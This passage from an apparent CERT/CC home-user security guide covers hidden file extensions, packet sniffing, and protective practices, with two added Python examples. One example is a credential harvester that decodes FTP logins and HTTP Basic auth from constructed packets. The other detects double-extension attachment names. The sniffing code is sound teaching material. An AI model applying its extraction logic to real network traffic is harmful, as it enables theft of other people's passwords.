        Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but a user may choose to disable this option in order to have file extensions displayed by Windows. Multiple email-borne viruses are known to exploit hidden file extensions. The first major attack that took advantage of a hidden file extension was the VBS/LoveLetter worm which contained an email attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs". Other malicious programs have since incorporated similar naming schemes. Examples include
        • Downloader (MySis.avi.exe or QuickFlick.mpg.exe)
        • VBS/Timofonica (TIMOFONICA.TXT.vbs)
        • VBS/CoolNote (COOL_NOTEPAD_DEMO.TXT.vbs)
        • VBS/OnTheFly (AnnaKournikova.jpg.vbs)
        The files attached to the email messages sent by these viruses may appear to be harmless text (.txt), MPEG (.mpg), AVI (.avi) or other file types when in fact the file is a malicious script or executable (.vbs or .exe, for example).
      11. Chat clients
        Internet chat applications, such as instant messaging applications and Internet Relay Chat (IRC) networks, provide a mechanism for information to be transmitted bi-directionally between computers on the Internet. Chat clients provide groups of individuals with the means to exchange dialog, web URLs, and in many cases, files of any type.
        Because many chat clients allow for the exchange of executable code, they present risks similar to those of email clients. As with email clients, care should be taken to limit the chat client’s ability to execute downloaded files. As always, you should be wary of exchanging files with unknown parties.
      12. Packet sniffing
        A packet sniffer is a program that captures data from information packets as they travel over the network. That data may include user names, passwords, and proprietary information that travels over the network in clear text. With perhaps hundreds or thousands of passwords captured by the packet sniffer, intruders can launch widespread attacks on systems. Installing a packet sniffer does not necessarily require administrator-level access, although on most modern operating systems putting the network interface into promiscuous mode, which the sniffer needs in order to see traffic addressed to other machines, does require that privilege; an intruder who has already compromised the computer usually has it.
        Relative to DSL and traditional dial-up users, cable modem users have historically had a higher risk of exposure to packet sniffers, since entire neighborhoods of cable modem users were effectively part of the same LAN. A packet sniffer installed on any cable modem user's computer in a neighborhood may be able to capture data transmitted by any other cable modem in the same neighborhood. Later DOCSIS versions support encryption between each modem and the cable head end, which narrows this exposure, but the general rule stands: anything sent in clear text over a shared medium, including a wireless network, should be assumed readable by everyone else on it.
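        What a sniffer actually extracts from clear-text traffic, as an added Python example that is not part of the CERT document. The "capture" is constructed inline (documentation address ranges, invented credentials), and the IP/TCP packet builder exists only to produce that sample input; a real sniffer would read from a raw socket or libpcap, which on most systems needs administrator or root privilege. The TLS packet at the end is included to show the contrast: encrypted payloads yield nothing.

```python
import base64
import re
import socket
import struct


def build_ipv4_tcp(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Assemble a minimal IPv4+TCP packet as sample input. Checksums are left
    zero because nothing here is ever sent; it only feeds the parser below."""
    ip_header = struct.pack("!BBHHHBBH4s4s",
                            0x45, 0, 40 + len(payload), 0x1234, 0, 64, 6, 0,
                            socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp_header = struct.pack("!HHLLBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return ip_header + tcp_header + payload


def parse_ipv4_tcp(raw: bytes):
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP packet, else None."""
    if len(raw) < 20:
        return None
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or proto != 6 or len(raw) < ihl + 20:
        return None
    sport, dport, _, _, offset_byte = struct.unpack("!HHLLB", raw[ihl:ihl + 13])
    data_offset = (offset_byte >> 4) * 4
    payload = raw[ihl + data_offset:total_len]
    return socket.inet_ntoa(src), socket.inet_ntoa(dst), sport, dport, payload


# Clear-text credential patterns a sniffer would look for in TCP payloads.
FTP_LOGIN = re.compile(rb"^(USER|PASS) (.+?)\r?$", re.MULTILINE)
HTTP_BASIC = re.compile(rb"^Authorization: Basic (\S+)", re.MULTILINE)


def harvest_credentials(packets) -> list:
    """Walk captured packets and collect (src, dst, kind, value) for anything
    sent in the clear. Encrypted payloads match nothing, which is the point."""
    found = []
    for raw in packets:
        parsed = parse_ipv4_tcp(raw)
        if parsed is None:
            continue
        src, dst, _, _, payload = parsed
        for m in FTP_LOGIN.finditer(payload):
            found.append((src, dst, m.group(1).decode(), m.group(2).decode()))
        for m in HTTP_BASIC.finditer(payload):
            try:
                found.append((src, dst, "http-basic", base64.b64decode(m.group(1)).decode()))
            except (ValueError, UnicodeDecodeError):
                pass  # malformed header: nothing usable
    return found


# Constructed "capture": an FTP login, an HTTP request with Basic auth, and a
# TLS application-data record whose contents are opaque to the sniffer.
SAMPLE_PACKETS = [
    build_ipv4_tcp("192.0.2.20", "198.51.100.7", 40001, 21, b"USER alice\r\n"),
    build_ipv4_tcp("192.0.2.20", "198.51.100.7", 40001, 21, b"PASS s3cret\r\n"),
    build_ipv4_tcp("192.0.2.20", "198.51.100.8", 40002, 80,
                   b"GET /private HTTP/1.1\r\nHost: www.example.org\r\n"
                   b"Authorization: Basic " + base64.b64encode(b"bob:hunter2") + b"\r\n\r\n"),
    build_ipv4_tcp("192.0.2.20", "198.51.100.9", 40003, 443,
                   b"\x17\x03\x03\x00\x20" + bytes(range(0x40, 0x60))),
]

if __name__ == "__main__":
    for entry in harvest_credentials(SAMPLE_PACKETS):
        print(entry)
```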

    3. Accidents and other risks
      In addition to the risks associated with connecting your computer to the Internet, there are a number of risks that apply even if the computer has no network connections at all. Most of these risks are well-known, so we won’t go into much detail in this document, but it is important to note that the common practices associated with reducing these risks may also help reduce susceptibility to the network-based risks discussed above.
      1. Disk failure
        Recall that availability is one of the three key elements of information security. Although all stored data can become unavailable -- if the media it’s stored on is physically damaged, destroyed, or lost -- data stored on hard disks is at higher risk due to the mechanical nature of the device. Hard disk crashes are a common cause of data loss on personal computers. Regular system backups are the only effective remedy.
      2. Power failure and surges
        Power problems (surges, blackouts, and brown-outs) can cause physical damage to a computer, inducing a hard disk crash or otherwise harming the electronic components of the computer. Common mitigation methods include using surge suppressors and uninterruptible power supplies (UPS).
      3. Physical theft
        Physical theft of a computer, of course, results in the loss of confidentiality and availability, and (assuming the computer is ever recovered) makes the integrity of the data stored on the disk suspect. Regular system backups (with the backups stored somewhere away from the computer) allow for recovery of the data, but backups alone cannot address confidentiality. Cryptographic tools are available that can encrypt data stored on a computer’s hard disk. The CERT/CC encourages the use of these tools if the computer contains sensitive data or is at high risk of theft (e.g. laptops or other portable computers).

  • Actions home users can take to protect their computer systems
    The CERT/CC recommends the following practices to home users:
    1. Consult your system support personnel if you work from home
    2. Use virus protection software
    3. Use a firewall
    4. Don’t open unknown email attachments
    5. Don’t run programs of unknown origin
    6. Disable hidden filename extensions
    7. Keep all applications (including your operating system) patched
    8. Turn off your computer or disconnect from the network when not in use
    9. Disable Java, JavaScript, and ActiveX if possible
    10. Disable scripting features in email programs
    11. Make regular backups of critical data
    12. Make a boot disk in case your computer is damaged or compromised
    Further discussion on each of these points is given below.

    Recommendations

    1. Consult your system support personnel if you work from home
      If you use your broadband access to connect to your employer's network via a Virtual Private Network (VPN) or other means, your employer may have policies or procedures relating to the security of your home network. Be sure to consult with your employer's support personnel, as appropriate, before following any of the steps outlined in this document.
    2. Use virus protection software
      The CERT/CC recommends the use of anti-virus software on all Internet-connected computers. Be sure to keep your anti-virus software up-to-date. Many anti-virus packages support automatic updates of virus definitions. We recommend the use of these automatic updates when available.
    3. Use a firewall
      We strongly recommend the use of some type of firewall product, such as a network appliance or a personal firewall software package. Intruders are constantly scanning home user systems for known vulnerabilities. Network firewalls (whether software or hardware-based) can provide some degree of protection against these attacks. However, no firewall can detect or stop all attacks, so it’s not sufficient to install a firewall and then ignore all other security measures.
    4. Don't open unknown email attachments
      Before opening any email attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus spread precisely because it originated from a familiar address. Malicious code might be distributed in amusing or enticing programs.
      If you must open an attachment before you can verify the source, we suggest the following procedure:
      1. be sure your virus definitions are up-to-date (see "Use virus protection software" above)
      2. save the file to your hard disk
      3. scan the file using your antivirus software
      4. open the file
      For additional protection, you can disconnect your computer's network connection before opening the file.
      Following these steps will reduce, but not wholly eliminate, the chance that any malicious code contained in the attachment might spread from your computer to others.
    5. Don't run programs of unknown origin
      Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program.
    6. Disable hidden filename extensions
      Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but you can disable this option in order to have file extensions displayed by Windows. After disabling this option, there are still some file extensions that, by default, will continue to remain hidden.
      There is a registry value which, if set, will cause Windows to hide certain file extensions regardless of user configuration choices elsewhere in the operating system. The "NeverShowExt" registry value is used to hide the extensions for basic Windows file types. For example, the ".LNK" extension associated with Windows shortcuts remains hidden even after a user has turned off the option to hide extensions.
      Specific instructions for disabling hidden file name extensions are given in http://www.cert.org/incident_notes/IN-2000-07.html
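      A model of how a double-extension attachment name appears under each display setting, as an added Python example that is not part of the CERT document; it covers both the "Hidden file extensions" risk described earlier and the NeverShowExt caveat above. The sets of executable, decoy and NeverShowExt extensions are illustrative assumptions for the example, not Windows' full registry; the attachment names are the ones quoted in this document plus two constructed controls.

```python
import os

# Illustrative extension sets, assumed for this example (not an exhaustive
# account of what Windows treats as executable or as a document).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".lnk",
                   ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta"}
DECOY_EXTS = {".txt", ".doc", ".pdf", ".jpg", ".gif", ".mpg", ".avi", ".mp3", ".htm"}
KNOWN_EXTS = EXECUTABLE_EXTS | DECOY_EXTS

# Types whose registry class carries NeverShowExt on older Windows releases, so
# the extension stays hidden even after "Hide file extensions" is turned off.
# Assumed for this example; verify under HKEY_CLASSES_ROOT on a real system.
NEVER_SHOW_EXT = {".lnk", ".pif", ".url", ".shs", ".shb"}


def displayed_name(filename: str, hide_known_extensions: bool) -> str:
    """Name as Explorer would show it under the given setting."""
    root, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext in NEVER_SHOW_EXT:
        return root  # hidden regardless of the user's choice
    if hide_known_extensions and ext in KNOWN_EXTS:
        return root  # hidden only while the default setting is on
    return filename


def assess(filename: str, hide_known_extensions: bool = True) -> dict:
    """Compare what the user sees with what the file actually is."""
    real_ext = os.path.splitext(filename)[1].lower()
    shown = displayed_name(filename, hide_known_extensions)
    apparent_ext = os.path.splitext(shown)[1].lower()
    return {
        "real_extension": real_ext,
        "displayed_as": shown,
        "apparent_extension": apparent_ext,
        # Deceptive: runs as code but is displayed with a harmless-looking type.
        "deceptive": real_ext in EXECUTABLE_EXTS and apparent_ext in DECOY_EXTS,
    }


def flag_deceptive(filenames, hide_known_extensions: bool = True) -> list:
    """Attachment names that would mislead the user under the given setting."""
    return [f for f in filenames if assess(f, hide_known_extensions)["deceptive"]]


# Names quoted in the document, plus two constructed controls at the end.
SAMPLE_ATTACHMENTS = [
    "LOVE-LETTER-FOR-YOU.TXT.vbs",
    "AnnaKournikova.jpg.vbs",
    "MySis.avi.exe",
    "invoice.pdf.lnk",
    "notes.txt",
    "setup.exe",
]

if __name__ == "__main__":
    for setting in (True, False):
        print("hide known extensions =", setting, "->",
              flag_deceptive(SAMPLE_ATTACHMENTS, setting))
```

      Turning the setting off removes most of the deception, but `invoice.pdf.lnk` is still displayed as `invoice.pdf`, which is exactly why the NeverShowExt registry value matters: a mail filter or a cautious user should judge an attachment by its real final extension, not by what Explorer shows.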
    7. Keep all applications, including your operating system, patched
      Vendors will usually release patches for their software when a vulnerability has been discovered. Most product documentation offers a method to get updates and patches. You should be able to obtain updates from the vendor's web site. Read the manuals or browse the vendor's web site for more information.
      Some applications will automatically check for available updates, and many vendors offer automatic notification of updates via a mailing list. Look on your vendor's web site for information about automatic notification. If no mailing list or other automated notification mechanism is offered you may need to check periodically for updates.
    8. Turn off your computer or disconnect from the network when not in use
      Turn off your computer or disconnect its Ethernet interface when you are not using it. An intruder cannot attack your computer if it is powered off or otherwise completely disconnected from the network.
    9. Disable Java, JavaScript, and ActiveX if possible
      Be aware of the risks involved in the use of "mobile code" such as ActiveX, Java, and JavaScript. An attacker may attach a script to something sent to a web site, such as a URL, an element in a form, or a database inquiry. Later, when the web site responds to you, the malicious script is transferred to your browser.
      The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Turning off these options will protect you from most malicious scripts, though not from every attack a page can carry. However, it will limit the interaction you can have with some web sites.
      Many legitimate sites use scripts running within the browser to add useful features. Disabling scripting may degrade the functionality of these sites.
      More information on ActiveX security, including recommendations for users who administer their own computers, is available in http://www.cert.org/archive/pdf/activeX_report.pdf
      More information regarding the risks posed by malicious code in web links can be found in CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests.
    10. Disable scripting features in email programs
      Because many email programs use the same code as web browsers to display HTML, vulnerabilities that affect ActiveX, Java, and JavaScript are often applicable to email as well as web pages. Therefore, in addition to disabling scripting features in web browsers (see "Disable Java, JavaScript, and ActiveX if possible", above), we recommend that users also disable these features in their email programs.
    11. Make regular backups of critical data
      Keep a copy of important files on removable media such as ZIP disks or recordable CD-ROM disks (CD-R or CD-RW disks). Use software backup tools if available, and store the backup disks somewhere away from the computer.
    12. Make a boot disk in case your computer is damaged or compromised
      To aid in recovering from a security breach or hard disk failure, create a boot disk on a floppy disk which will help when recovering a computer after such an event has occurred. Remember, however, you must create this disk before you have a security event.